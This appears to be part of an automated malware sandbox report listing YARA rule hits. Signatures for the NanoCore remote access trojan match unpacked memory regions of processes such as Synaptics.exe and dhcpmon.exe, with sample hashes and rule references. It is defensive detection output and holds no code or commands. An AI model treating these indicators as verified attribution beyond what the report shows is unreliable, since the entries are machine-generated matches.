            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
